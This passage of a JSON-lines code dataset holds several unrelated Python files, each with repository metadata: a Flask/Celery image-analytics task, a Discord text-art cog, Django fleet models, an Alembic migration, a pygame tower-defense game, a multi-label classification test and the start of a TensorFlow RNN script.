{len(find_item_inside_shelf)}\")\n if len(find_item_inside_shelf) > 0:\n #total compliance item formula using intersection of two sets\n comp_list_as_set = set(compliance_items)\n intersection = comp_list_as_set.intersection(find_item_inside_shelf)\n final_intersected_compliance_items = list(intersection)\n\n print_debug_info(f\"compliance items list {final_intersected_compliance_items}\")\n \n total_compliance_items_count = len(final_intersected_compliance_items)\n total_shelf_items_count = len(find_item_inside_shelf)\n total_ratio = total_compliance_items_count / total_shelf_items_count\n compliance_metadata = ComplianceMetaData(find_item_inside_shelf,\n final_intersected_compliance_items,\n each_shelf.shelfName,\n each_shelf.shelfTag,\n total_compliance_items_count,\n total_shelf_items_count,\n total_ratio,\n each_shelf.complianceLevel)\n compliance_collection.append(compliance_metadata)\n else:\n logger.info(f\"No Compliance item found\")\n\n print_debug_detail(f\"loop-end\")\n\n else:\n logger.info(f\"Shelf not found\")\n print_debug_detail(f\"main-loop-end\")\n \n json_string = json.dumps([ob.__dict__ for ob in compliance_collection], cls=ComplexEncoder)\n print_debug_detail(f\"Compliance Json data\")\n print_debug_detail(f\"{json_string}\")\n 
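# json_string above is the per-shelf ComplianceMetaData list serialized through ComplexEncoder\n    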
print_debug_info(f\"exit from build_shelf_compliance\")\n return json_string\n\ndef build_analytics(category_detail_obj, model_response_json): \n actual_group_data = None\n actual_group_name = []\n #build analytics information\n category_response = []\n #build topline information\n topline_response = []\n\n group_data = model_response_json['GroupData'] \n print_debug_info(f\"length of group_data is {len(group_data)}\")\n for v in group_data: \n actual_group_data = json.loads(v) \n for each_key in actual_group_data:\n actual_group_name.append(each_key['BRAND'])\n \n for cat_obj in category_detail_obj:\n tages = cat_obj.tages.split(\",\")\n not_found_brand = list(set(tages)-set(actual_group_name))\n found_brand = list(set(tages)-set(not_found_brand)) \n \n temp_tags_counter = []\n for fb in found_brand:\n ag_data_item = next(item for item in actual_group_data if item[\"BRAND\"] == fb)\n temp_tags_counter.append(BrandResponse(ag_data_item['BRAND'], ag_data_item['COUNT']))\n for nfb in not_found_brand:\n temp_tags_counter.append(BrandResponse(nfb,0))\n\n if cat_obj.dataContainer == \"Analytics\":\n print_debug_detail(\" Is Analytics Type \")\n category_response.append(CategoryResponse(cat_obj.category_name , cat_obj.subcategory_name, temp_tags_counter, cat_obj.show_type))\n else:\n print_debug_detail(\" Is TopLine Type \")\n topline_response.append(CategoryResponse(cat_obj.category_name , cat_obj.subcategory_name, temp_tags_counter, cat_obj.show_type))\n\n json_string = json.dumps([ob.__dict__ for ob in category_response], cls=ComplexEncoder)\n topline_json_string = json.dumps([ob.__dict__ for ob in topline_response], cls=ComplexEncoder)\n \n print_debug_detail(f\"Analytic Json data\")\n print_debug_detail(f\"{json_string}\")\n print_debug_detail(f\"Topline analytic Json data\")\n print_debug_detail(f\"{topline_json_string}\")\n print_debug_info(f\"exit from build_analytics\")\n return json_string, topline_json_string\n\ndef build_analytics_and_compliance(category_detail_obj, model_response, shelf_compliance):\n # temp for dev or testing\n #response_obj = requests.get(\"http://knowhow.markematics.net/ReceiveJobs/GetJobDetailById/2\")\n #logger.info(response_obj.text)\n # for dev or testing\n #model_response_json = json.loads(response_obj.text) \n \n # for live\n model_response_json = json.loads(model_response)\n\n print_debug_detail(\"model_response json loaded\") \n print_debug_detail(f\"{model_response_json}\")\n\n #build analytic json\n print_debug_info(\"Calling build analytics\") \n analytic_json, topline_json_string = build_analytics(category_detail_obj, model_response_json)\n \n #build compliance json\n print_debug_info(\"Calling build compliance\")\n compliance_json = build_shelf_compliance(model_response_json, shelf_compliance) \n\n # here rebuild the json object using [GroupData, UngroupData, BrandName, Compliance, Analytics] objects\n print_debug_info(\"Compiling Compliance & Analytics Json response\")\n json_response = json.dumps({\"GroupData\":model_response_json['GroupData'],\"UngroupData\":model_response_json['UngroupData'],\"BrandName\":model_response_json['BrandName'],\"Compliance\":compliance_json,\"Analytics\":analytic_json,\"Topline\":topline_json_string})\n print_debug_detail(json_response)\n return json_response\n\ndef print_debug_info(data):\n is_debug = True\n if is_debug:\n logger.info(data)\n\ndef print_debug_detail(data):\n is_debug = True\n if is_debug:\n logger.info(data)\n\n@celery.task()\ndef process_image(job_id, model_id, project_id):\n model_detail_obj = 
None\n received_job_obj = None\n\n category_detail_obj = []\n\n print_debug_info(\"process_image_call\")\n bridge = BridgeManager().get_Instance().get_Bridge()\n \n print_debug_info(\"getting_model_detail_call\") \n model_details = bridge.get_db().get_session().query(AiModelDetail).filter(AiModelDetail.modelID == model_id)\n\n for model in model_details:\n print_debug_info(f\"{model.id} {model.port} {model.url} {model.version} {model.modelJson} {model.status} {model.modelID}\")\n model_detail_obj = model\n logger.info(model_detail_obj)\n \n print_debug_info(\"getting_job_detail\")\n received_jobs = bridge.get_db().get_session().query(ReceiveJobs).filter(ReceiveJobs.id == job_id)\n for job in received_jobs:\n print_debug_info(f\"{job.unProcessedImage} {job.uri}\")\n received_job_obj = job\n logger.info(received_job_obj)\n\n print_debug_info(\"category_and_subcategory_loading\")\n category_obj = bridge.get_db().get_session().query(Category).filter(Category.projectId == project_id)\n\n print_debug_info(\"shelf_compliance_loading\")\n shelf_compliance_obj = bridge.get_db().get_session().query(ShelfCompliance).filter(ShelfCompliance.projectId == project_id)\n\n for category in category_obj:\n print_debug_info(f\"{category.categoryName}\") \n sub_category_obj = bridge.get_db().get_session().query(SubCategory).filter(SubCategory.categoryId == category.id) \n for sub_category in sub_category_obj:\n print_debug_info(f\"{sub_category.name}\")\n category_detail_obj.append(CategoryDetail(category.id, category.categoryName, category.dataContainer, category.categoryDescription, category.showType, sub_category.id, sub_category.name, sub_category.tages))\n\n # temp dev or testing analytics\n #build_analytics_and_compliance(category_detail_obj,\"\",shelf_compliance_obj)\n\n print_debug_info(\"checking_pending_job_status\")\n if received_job_obj != None:\n # Checking received job status\n if received_job_obj.requestStatus.lower() == JOB_STATUS_INSERTED:#len(received_job_obj.requestStatus.lower()) > 0:\n print_debug_info(received_job_obj.requestStatus)\n print_debug_info(f\"Updating status value from Inserted to Pending against {job_id}\")\n\n # Update received job status into PENDING \n bridge.get_db().get_session().query(ReceiveJobs).filter_by(id = job_id).update({ReceiveJobs.requestStatus:JOB_STATUS_PENDING})\n bridge.get_db().get_session().commit()\n \n # Generating image processing request url\n request_url = get_url(model_detail_obj.url, model_detail_obj.port, \"upload-image\")\n\n print_debug_info(f\"Generating image processing request url {request_url}\")\n try:\n # Sending image to model for analysis\n headers = {'Content-type': 'application/json'}\n request_data = {'data_url':received_job_obj.uri,'job_id':job_id}\n print_debug_info(f\"Request data inside {request_data}\") \n response_obj = requests.post(request_url, data = json.dumps(request_data), headers=headers)\n print_debug_info(response_obj.text)\n if response_obj.status_code == 200:\n\n # build live analytic \n print_debug_info(\"> Sending Request for Complianc & Analysis Building\") \n analytic_data = build_analytics_and_compliance(category_detail_obj, response_obj.text, shelf_compliance_obj) \n \n # Update received job status into DONE \n bridge.get_db().get_session().query(ReceiveJobs).filter_by(id = job_id).update({ReceiveJobs.requestStatus:JOB_STATUS_DONE,ReceiveJobs.dataResponse:analytic_data})\n bridge.get_db().get_session().commit()\n elif response_obj.status_code == 400 or response_obj.status_code == 500:\n # Update received job 
status into ERROR \n bridge.get_db().get_session().query(ReceiveJobs).filter_by(id = job_id).update({ReceiveJobs.requestStatus:JOB_STATUS_ERROR,ReceiveJobs.dataResponse:response_obj.status_code})\n bridge.get_db().get_session().commit()\n except:\n # Update received job status into ERROR \n bridge.get_db().get_session().query(ReceiveJobs).filter_by(id = job_id).update({ReceiveJobs.requestStatus:JOB_STATUS_COMMUNICATION_ERROR,ReceiveJobs.dataResponse:\"Communication Error\"})\n bridge.get_db().get_session().commit() \n else:\n print_debug_info(f\"Job does not proceed {received_job_obj.requestStatus}\")\n print_debug_info(\"updating_pending_job_status\")\n","repo_name":"technetbytes/Pythonic-Flask-Celery","sub_path":"app/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":14050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13336443242","text":"import disnake\nfrom disnake.ext import commands\nimport art\n\n\nclass Etc(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n @commands.slash_command(name=\"big-text\", brief=\"Makes the text a big boy!.\")\n async def cmd_big_text(self, inter, text: str = commands.Param(),\n font: str = commands.Param(desc='Python Art text2art supported fonts.', default='ascii')):\n \"\"\"\n big boy textifer\n :Context inter:\n :string text:\n \"\"\"\n try:\n await inter.response.send_message(f\"```{art.text2art(text, font=font)}```\")\n except art.artError:\n await inter.response.send_message(f\":exclamation: Something went wrong! Are you sure {font} exists within text2art?\")\n\n\ndef setup(bot):\n bot.add_cog(Etc(bot))\n","repo_name":"Planet-Express-Labs/Zoidberg-neo","sub_path":"cogs/etc.py","file_name":"etc.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22038676627","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import\nfrom __future__ import unicode_literals\nfrom django.conf import settings\nfrom django.core.validators import MinValueValidator\n\nfrom django.db import models\n\n# Create your models here.\nfrom django.utils.translation import ugettext as _\nfrom sitetree.models import TreeItemBase\n\n\nclass SmartTreeItem(TreeItemBase):\n icon_css_class = models.CharField(_('CSS class of icon'), max_length=50, null=True, blank=True)\n show_icon = models.BooleanField(_('Show icon of this item'), default=False)\n\n\n# classes abstratas\nclass ModeloBasico(models.Model):\n \"\"\"\n Modelo padrao abstrato para controle de data e hora de criacao e modificacao\n \"\"\"\n criado_em = models.DateTimeField(_('Criando em'), auto_now_add=True, editable=False,\n help_text=_('Data e Hora em que este registro foi criado'))\n modificado_em = models.DateTimeField(_('Modificado em'), auto_now=True,\n help_text=_('Data e Hora em que este registro foi modificado'))\n\n criado_por = models.ForeignKey(settings.AUTH_USER_MODEL,\n related_name=\"%(app_label)s_%(class)s_criado_por\",\n null=True, editable=False)\n modificado_por = models.ForeignKey(settings.AUTH_USER_MODEL,\n related_name=\"%(app_label)s_%(class)s_modificado_por\",\n null=True,\n editable=False)\n\n esta_ativo = models.BooleanField(_(u'Esta ativo?'), default=True, help_text='')\n\n class Meta:\n abstract = True\n\n\nclass ModeloTemporal(ModeloBasico):\n \"\"\"\n Modelo padrao abstrato para controle de data e hora de criacao e modificacao e periodo de validade\n \"\"\"\n dtvalido_de = 
models.DateField(_('Data inicial de utilizacao'), auto_now_add=True, editable=False)\n dtvalido_ate = models.DateField(_('Data final de utilizacao'), blank=True, null=True)\n\n class Meta:\n abstract = True\n\n\n# class Colaborador(ModeloBasico):\n# \"\"\"\n# Ver apresentacao de um dos criadores do Django:\n# https://speakerdeck.com/freakboy3742/red-user-blue-user-myuser-auth-dot-user\n#\n# Verificar necessidade de utilização de models proxy\n# http://www.marinhobrandao.com/blog/proxy-models-quase-uma-bala-de-prata/\n# \"\"\"\n# nome = models.CharField(_('Nome'), max_length=40)\n# sobrenome = models.CharField(_('Sobrenome'), max_length=255)\n# identificador_unico = models.CharField(_('CPF'), max_length=255, unique=True)\n# data_nasc = models.DateField(_('Data de Nascimento'))\n# #usuario = models.OneToOneField('users.User', null=True, related_name='colaborador_user')\n#\n#\n# class Meta:\n# verbose_name = _('UserProfile')\n# verbose_name_plural = _('Colaboradores')\n# ordering = ['-nome', '-sobrenome']\n\n\nclass CNH(ModeloBasico):\n \"\"\"\n Categoria A – habilita a condução de veículo motorizado de duas ou três rodas, com ou sem carro lateral\n (motos, triciclos etc);\n\n Categoria B – habilita a condução de veículo motorizado, não abrangido pela categoria A, cujo peso bruto\n total não exceda a três mil e quinhentos quilogramas e cuja lotação não exceda a oito lugares, excluído o do\n motorista (carros de passeio);\n\n Categoria C – habilita a condução de veículo motorizado utilizado em transporte de carga, cujo peso bruto\n total exceda a três mil e quinhentos quilogramas (caminhões) e utilizado para transporte de até 8 pessoas.\n Para habilitar-se na categoria C, o condutor deve estar habilitado há, pelo menos, um ano na categoria B e\n não ter cometido nenhuma infração grave ou gravíssima, nem ser reincidente em infrações médias, durante os\n últimos doze meses.\n\n Categoria D – condutor de veículo motorizado utilizado no transporte de passageiros, cuja lotação exceda a\n oito lugares, excluído o do motorista (ônibus). Para habilitar-se na categoria D, o condutor deve estar habilitado\n há, pelo menos, um ano na categoria C ou há dois anos na categoria B e não ter cometido nenhuma infração grave ou\n gravíssima, nem ser reincidente em infrações médias nos últimos doze meses.\n\n Categoria E – condutor de combinação de veículos em que a unidade tratora se enquadre nas categorias B, C ou D e\n cuja unidade acoplada, reboque, semi-reboque ou articulada, tenha seis mil quilogramas ou mais de peso bruto total,\n ou cuja lotação exceda a oito lugares, ou, ainda, seja enquadrado na categoria trailer. 
Para habilitar-se na\n categoria E, o condutor deve estar habilitado na categoria D ou há, pelo menos, um ano na categoria C e não ter\n cometido nenhuma infração grave ou gravíssima, nem ser reincidente em infrações médias nos últimos doze meses.9\n \"\"\"\n # Choices\n CNHTipo = (\n ('A', 'Categoria A'),\n ('B', 'Categoria B'),\n ('C', 'Categoria C'),\n ('D', 'Categoria D'),\n ('E', 'Categoria E'),\n ('AB', 'Categoria AB'),\n ('AC', 'Categoria AC'),\n ('AD', 'Categoria AD'),\n ('AE', 'Categoria AE'),\n )\n\n numero_cnh = models.CharField(_('Número CNH'), max_length=12, )\n categoria = models.CharField(_('Categoria'), max_length=12, choices=CNHTipo)\n validade = models.DateField(null=True)\n\n\n class Meta:\n verbose_name = _('CNH')\n verbose_name_plural = _('CNHs')\n ordering = ['-numero_cnh', '-categoria', '-validade']\n\n def __unicode__(self):\n return 'CNH Nº: {0} - Categoria: {1} - Validade: {2}'.format(self.numero_cnh, self.categoria, self.validade)\n\n\n# class Condutora(Pessoa, CNH):\n# \"\"\"\n# Condutor teste\n# \"\"\"\n#\n# class Meta:\n# verbose_name = _('Condutor')\n# verbose_name_plural = _('Condutores')\n\n\n\n\nclass Produto(ModeloBasico):\n pass\n\n def __unicode__(self):\n return self.nome\n\n\nclass Fornecedor(ModeloBasico):\n nome = models.CharField(max_length=255)\n nome_fantasia = models.CharField(max_length=255)\n cnpj = models.CharField(max_length=255)\n\n def __unicode__(self):\n return unicode(self.nome_fantasia)\n\n\nclass Combustivel(models.Model):\n nome = models.CharField(max_length=50)\n\n def __unicode__(self):\n return self.nome\n\n class Meta:\n verbose_name = _('Combustivel')\n verbose_name_plural = _('Combustiveis')\n ordering = ['nome']\n\n\nclass Cor(models.Model):\n nome = models.CharField(max_length=50)\n\n def __unicode__(self):\n return self.nome\n\n class Meta:\n verbose_name = _('Cor')\n verbose_name_plural = _('Cores')\n ordering = ['nome']\n\n\nclass Orgao(ModeloTemporal):\n nome = models.CharField(max_length=255)\n sigla = models.CharField(max_length=20)\n\n def __unicode__(self):\n return self.nome\n\n#\n# class Acessorio(ModeloBasico):\n# descricao = models.CharField(max_length=255)\n# eh_obrigatorio = models.BooleanField(default=False, verbose_name=u'É obrigatório')\n#\n# def __unicode__(self):\n# return u'{0}'.format(self.descricao)\n#\n# class Meta:\n# verbose_name = u'Acessório'\n# verbose_name_plural = u'Acessórios'\n#\n#\n#\n#\n# COR_PLACA = (\n#\n# )\n#\n#\n#\n# class Periodo(models.Model):\n# data_inicial = models.DateTimeField()\n# data_final = models.DateTimeField()\n# descricao = models.TextField()\n#\n\n# class VeiculoPlaca(ModeloBasico):\n# placa = models.ForeignKey('Placa')\n# veiculo = models.ForeignKey('veiculos.Veiculo')\n#\n#\n# class EspecieTipoVeicular(models.Model):\n# pass\n#\n#\n# class UnidadeMedida(models.Model):\n# sigla = models.CharField(max_length=20)\n# descricao = models.TextField()\n#\n#\n# class ConsumoCombustivel(models.Model):\n# medido_em = models.DateTimeField(_('Medido em'), auto_now_add=True, editable=False)\n# ativo = models.BooleanField(_(u'Esta ativo?'), default=True)\n# consumo = models.DecimalField(decimal_places=2, max_digits=4)\n# veiculo = models.ForeignKey('veiculos.Veiculo', related_name='consumo_combustivel_veiculo')\n#\n#\n# class Odometro(models.Model):\n# valor = models.PositiveIntegerField()\n# data_registro = models.DateTimeField(auto_now_add=True)\n# tipo_registro = models.CharField(max_length=200, choices=(('entrada', 'Entrada'),\n# ('saida', 'Saida'))\n# )\n#\n# def 
__unicode__(self):\n# return '{0} - {1}'.format(self.valor, self.tipo_registro)\n\n\n# class AcessorioVeiculoConservacao(models.Model):\n# ESTADO_CONSERVACAO = (\n# ('bom', 'Bom'),\n# ('regular', 'Regular'),\n# ('imprestavel', 'Imprestavel'),\n# ('faltando', 'Faltando'),\n# )\n#\n# acessorio = models.ForeignKey('Acessorio')\n# veiculo = models.ForeignKey('veiculos.Veiculo')\n# conservacao = models.CharField(max_length=11, choices=ESTADO_CONSERVACAO)\n#\n# class Meta:\n# verbose_name = u'Acessório'\n# verbose_name_plural = u'Acessórios'\n#\n","repo_name":"luzfcb/sisposto","sub_path":"sisposto/apps/core/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":9087,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15676100335","text":"\"\"\"added collection class\n\nRevision ID: 589e155746cf\nRevises: 3511e3ab31d9\nCreate Date: 2014-09-13 07:30:08.638095\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '589e155746cf'\ndown_revision = '3511e3ab31d9'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.create_table('custom_collections',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('pos_dept_id', sa.Integer(), nullable=True),\n sa.Column('title', sa.Text(), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('custom_collections')\n ### end Alembic commands ###\n","repo_name":"nkenealy/shopify-product-load","sub_path":"migrations/versions/589e155746cf_added_collection_class.py","file_name":"589e155746cf_added_collection_class.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38527365126","text":"import os.path\nfrom enemies.club import Club\nfrom enemies.ork import Ork\nfrom enemies.wizard import Wizard\nimport pygame\nfrom towers.stoneTowers import StoneTower, StoneTowerShort\nfrom towers.supportTower import DamageTower, RangeTower\nimport os\nimport time\nimport math\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom menu.menu import VerticalMenu, PlayPauseButton\nimport random\n\n\npygame.font.init()\npygame.init()\n\npath = [(546, 700),(546, 644), (460, 553), (660, 366), (737, 310), (637, 183), (785, 164), (623, 135) ,(623, -10)]\n\n\nlifes_img = pygame.transform.scale(pygame.image.load(os.path.join(\"game_assets\", \"heart.png\")), (48, 48))\nstar_img = pygame.transform.scale(pygame.image.load(os.path.join(\"game_assets\", \"star.png\")), (50, 50))\nside_img = pygame.transform.scale(pygame.image.load(os.path.join(\"game_assets\", \"side.png\")), (200, 500))\n\n\nbuy_stone1 = pygame.transform.scale(pygame.image.load(os.path.join(\"game_assets\", \"stone1.png\")), (50, 50))\nbuy_stone2 = pygame.transform.scale(pygame.image.load(os.path.join(\"game_assets\", \"stone2.png\")), (50, 50))\nbuy_damage = pygame.transform.scale(pygame.image.load(os.path.join(\"game_assets\", \"buy_damage.png\")), (50, 50))\nbuy_range = pygame.transform.scale(pygame.image.load(os.path.join(\"game_assets\", \"buy_range.png\")), (50, 50))\n\nplay_btn = pygame.transform.scale(pygame.image.load(os.path.join(\"game_assets/menu\", \"play_button.png\")), (150, 50))\npause_btn = pygame.transform.scale(pygame.image.load(os.path.join(\"game_assets/menu\", \"pause_button.png\")), (150, 
50))\n\nwave_bg = pygame.transform.scale(pygame.image.load(os.path.join(\"game_assets\", \"wave_bg.png\")), (250, 100))\n\n\nattack_tower_names = [\"stone1\", \"stone2\"]\nsupport_tower_names = [\"damage\", \"range\"]\n\n#load music\n#pygame.mixer.music.load(os.path.join(\"game_assets\", \"music.mp3\"))\n\n#waves are in form\n#frequency of enemies\n# (#ork, #wizard, #clubs)\n\nwaves = [\n [20, 0, 0],\n [50, 0, 0],\n [100, 0, 0],\n [0, 20, 0],\n [0, 50, 0],\n [0, 100, 0],\n [20, 100, 0],\n [50, 100, 0],\n [100, 100, 0],\n [0, 0, 50],\n [20, 0, 100],\n [20, 0, 150],\n [200, 100, 200],\n]\n\nclass Game:\n\n def __init__(self):\n self.width = 1350\n self.height = 700\n self.win = pygame.display.set_mode((self.width, self.height))\n self.enemys = []\n self.attack_towers = []\n self.support_towers = []\n self.lives = 10\n self.money = 1000\n self.bg = pygame.image.load(os.path.join(\"game_assets\", \"bg.png\"))\n self.bg = pygame.transform.scale(self.bg, (self.width, self.height))\n self.clicks = [] # remove\n self.timer = time.time()\n self.life_font = pygame.font.SysFont(\"comicsans\", 50)\n self.selected_tower = None\n self.menu = VerticalMenu(self.width - side_img.get_width() + 100, 150, side_img)\n self.menu.add_btn(buy_stone1, \"buy_stone1\", 300)\n self.menu.add_btn(buy_stone2, \"buy_stone2\", 500)\n self.menu.add_btn(buy_damage, \"buy_damage\", 200)\n self.menu.add_btn(buy_range, \"buy_range\", 400)\n self.wave = 0\n self.current_wave = waves[self.wave][:]\n self.pause = True\n self.playPauseButton = PlayPauseButton(play_btn, pause_btn, 10, self.height - 85)\n\n self.moving_object = None\n\n\n def gen_enemies(self):\n \"\"\"\n generate the next enemy or enemies to show\n :return: enemy\n \"\"\"\n if sum(self.current_wave)== 0 :\n if len(self.enemys) == 0:\n self.wave +=1\n self.current_wave = waves[self.wave]\n self.pause = True\n self.playPauseButton.paused = self.pause\n else:\n wave_enemies = [Ork(), Wizard(), Club()]\n for x in range(len(self.current_wave)):\n if self.current_wave[x] != 0:\n self.enemys.append(wave_enemies[x])\n self.current_wave[x] = self.current_wave[x] - 1\n break\n\n\n\n def run(self):\n # pygame.mixer.music.play(1)\n run = True\n clock = pygame.time.Clock()\n while run:\n clock.tick(100)\n\n if self.pause == False:\n #gen monsters\n if time.time() - self.timer >= random.randrange(1,5)/2:\n self.timer = time.time()\n self.gen_enemies()\n\n pos = pygame.mouse.get_pos()\n\n #check for moving object\n if self.moving_object:\n self.moving_object.move(pos[0], pos[1])\n tower_list = self.attack_towers[:] + self.support_towers[:]\n collide = False\n for tower in tower_list:\n if tower.collide(self.moving_object):\n collide = True\n tower.place_color = (255, 0, 0, 100)\n self.moving_object.place_color = (255, 0, 0, 100)\n else:\n tower.place_color = (0, 0, 255, 100)\n if not collide:\n self.moving_object.place_color = (0, 0, 0, 100)\n\n # main event loop\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n\n\n if event.type == pygame.MOUSEBUTTONUP:\n #if you'ra moving an object and click\n\n if self.moving_object:\n not_allowed = False\n tower_list = self.attack_towers[:] + self.support_towers[:]\n for tower in tower_list:\n if tower.collide(self.moving_object) :\n not_allowed = True\n\n\n if not not_allowed and self.point_to_line(self.moving_object):\n\n if self.moving_object.name in attack_tower_names:\n self.attack_towers.append(self.moving_object)\n elif self.moving_object.name in support_tower_names:\n 
self.support_towers.append(self.moving_object)\n\n self.moving_object.moving = False\n self.moving_object = None\n else:\n #check for plar or pause\n if self.playPauseButton.click(pos[0],pos[1]):\n self.pause = not(self.pause)\n self.playPauseButton.paused = self.pause\n\n\n\n #look if you click on side menu\n side_menu_button = self.menu.get_clicked(pos[0],pos[1])\n if side_menu_button:\n cost = self.menu.get_item_cost(side_menu_button)\n if self.money >= cost:\n self.money -= cost\n self.add_tower(side_menu_button)\n\n #look if you clicked on btn\n btn_clicked = None\n if self.selected_tower :\n btn_clicked = self.selected_tower.menu.get_clicked(pos[0],pos[1])\n if btn_clicked :\n print(btn_clicked)\n if btn_clicked == \"Upgrade\":\n cost = self.selected_tower.get_upgrade_cost()\n if self.money >= cost:\n self.money -= cost\n self.selected_tower.upgrade()\n\n\n if not (btn_clicked):\n #look if you click on attack towers\n for tw in self.attack_towers:\n if tw.click(pos[0],pos[1]):\n tw.selected = True\n self.selected_tower = tw\n else:\n tw.selected = False\n # look if you click on support towers\n for tw in self.support_towers:\n if tw.click(pos[0], pos[1]):\n tw.selected = True\n self.selected_tower = tw\n else:\n tw.selected = False\n\n if not(self.pause):\n # loop throught enemoes\n to_del = []\n for en in self.enemys:\n en.move()\n if en.y < -5:\n to_del.append(en)\n\n # delete all enemies off the screen\n for d in to_del:\n self.lives -= 1\n self.enemys.remove(d)\n\n\n # loop through attack_towers\n for tw in self.attack_towers:\n self.money += tw.attack(self.enemys)\n\n # loop through support _towers\n for tw in self.support_towers:\n tw.support(self.attack_towers)\n #if you lose\n if self.lives <= 0:\n print(\"You lose\")\n run = False\n\n self.draw()\n\n\n\n pygame.quit()\n\n def point_to_line(self, tower):\n \"\"\"\n returns if you can place tower based on distance from path\n :param tower: Tower\n :return: Bool\n \"\"\"\n\n # find two closest points\n return True\n\n def draw(self):\n self.win.blit(self.bg, (0, 0))\n # draw pacement rings\n if self.moving_object:\n for tower in self.attack_towers:\n tower.draw_placement(self.win)\n\n for tower in self.support_towers:\n tower.draw_placement(self.win)\n\n self.moving_object.draw_placement(self.win)\n\n\n # draw attack_towers\n\n for tw in self.attack_towers:\n tw.draw(self.win)\n\n # draw support_towers\n\n for tw in self.support_towers:\n tw.draw(self.win)\n # draw enemies\n\n for en in self.enemys:\n en.draw(self.win)\n\n #redraw selected tower\n if self.selected_tower:\n self.selected_tower.draw(self.win)\n\n\n #draw moving object\n if self.moving_object:\n self.moving_object.draw(self.win)\n\n\n #draw menu\n self.menu.draw(self.win)\n #draw play pause button\n self.playPauseButton.draw(self.win)\n\n #draw lives\n text = self.life_font.render(str(self.lives),1,(255, 255, 255))\n life = lifes_img\n start_x = self.width - life.get_width() -10\n\n self.win.blit(text, (start_x-text.get_width()-5, 5))\n self.win.blit(life, (start_x, 10))\n\n # draw money\n text = self.life_font.render(str(self.money), 1, (255, 255, 255))\n money = star_img\n start_x = self.width - life.get_width() - 10\n\n self.win.blit(text, (start_x - text.get_width() - 5, 70))\n self.win.blit(money, (start_x, 75))\n\n #draw wave\n self.win.blit(wave_bg, (10, 10))\n text = self.life_font.render(\"Wave #\" + str(self.wave),1, (255,255,255))\n self.win.blit(text, (10+ wave_bg.get_width()/2 - text.get_width()/2, 20))\n\n pygame.display.update()\n\n\n\n def 
add_tower(self, name):\n x, y = pygame.mouse.get_pos()\n name_list = [\"buy_stone1\",\"buy_stone2\", \"buy_damage\", \"buy_range\"]\n object_list = [StoneTower(x,y), StoneTowerShort(x,y), DamageTower(x,y), RangeTower(x,y)]\n try:\n obj = object_list[name_list.index(name)]\n self.moving_object = obj\n obj.moving = True\n except Exception as e:\n print(str(e) + \"NOT VALID NAME\")\n\n\n# win = pygame.display.set_mode((1350, 700))\n# g = Game()\n# g.run()\n","repo_name":"DemiyanPWNZ/project_game_Tower-Defense","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":11903,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"43374591862","text":"import scipy\nfrom scipy.io import arff\nimport pandas as pd\nfrom skmultilearn.problem_transform import BinaryRelevance\nfrom skmultilearn.problem_transform import ClassifierChain\nfrom skmultilearn.problem_transform import LabelPowerset\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.metrics import accuracy_score\nfrom skmultilearn.adapt import MLkNN\nimport numpy as np\n\ndata, meta = scipy.io.arff.loadarff('../../data/test/yeast-train.arff')\ndf_train = pd.DataFrame(data)\nstr_df = df_train.select_dtypes([np.object])\nstr_df = str_df.stack().str.decode('utf-8').unstack()\nX_train = df_train.iloc[:, 0:103]\nX_train = X_train.astype('float64')\ny_train = str_df\ny_train = y_train.astype('int')\n\ndata, meta = scipy.io.arff.loadarff('../../data/test/yeast-test.arff')\ndf_test = pd.DataFrame(data)\nstr_df = df_test.select_dtypes([np.object])\nstr_df = str_df.stack().str.decode('utf-8').unstack()\nX_test = df_test.iloc[:, 0:103]\nX_test = X_test.astype('float64')\ny_test = str_df\ny_test = y_test.astype('int')\n\n# ======================= Binary Relevance =================================\n# initialize binary relevance multi-label classifier\n# with a gaussian naive bayes base classifier\nclassifier = BinaryRelevance(GaussianNB())\n\n# train\nclassifier.fit(X_train, y_train)\n\n# predict\npredictions = classifier.predict(X_test)\n\nprint(accuracy_score(y_test, predictions))\n\n# ======================= Classifier Chains =================================\n# initialize classifier chains multi-label classifier\n# with a gaussian naive bayes base classifier\nclassifier = ClassifierChain(GaussianNB())\n\n# train\nclassifier.fit(X_train, y_train)\n\n# predict\npredictions = classifier.predict(X_test)\n\nprint(accuracy_score(y_test, predictions))\n\n# ======================= Label Powerset =================================\n# initialize Label Powerset multi-label classifier\n# with a gaussian naive bayes base classifier\nclassifier = LabelPowerset(GaussianNB())\n\n# train\nclassifier.fit(X_train, y_train)\n\n# predict\npredictions = classifier.predict(X_test)\n\nprint(accuracy_score(y_test, predictions))","repo_name":"phisitsrt/Data-Story","sub_path":"code/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22689021855","text":"#coding:utf-8\r\nimport tensorflow as tf\r\nimport input_data\r\n\r\n#加载mnist数据集\r\nmnist = input_data.read_data_sets('mnist/',one_hot=True)\r\n\r\n#定义参数\r\nlearning_rate = 0.01\r\nepochs = 50000\r\nbatch_size = 128\r\nn_inputs = 28\r\nn_steps = 28\r\nn_hidden_units = 128\r\nn_classes = 10\r\n\r\nxs = tf.placeholder(tf.float32,[None,n_steps,n_inputs]) #输入形状\r\nys = 
